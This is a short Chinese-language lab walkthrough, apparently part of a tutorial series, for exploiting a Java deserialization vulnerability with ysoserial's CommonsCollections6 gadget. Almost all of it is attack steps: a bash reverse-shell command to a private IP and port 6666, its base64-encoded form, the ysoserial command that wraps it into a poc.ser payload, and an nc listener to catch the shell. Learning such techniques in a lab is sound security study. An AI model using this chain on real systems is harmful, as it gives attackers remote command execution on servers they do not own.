还是先开启环境
浏览器访问跟上一个一模一样页面
还是用ysoserial.jar工具
然后准备好反弹shell的命令,需要对其进行base64加密
//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
java -jar ysoserial.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
1
执行完上述命令会生成一个poc.ser文件,接下来新打开一个cmd窗口执行以下命令:
nc -lvvp 6666
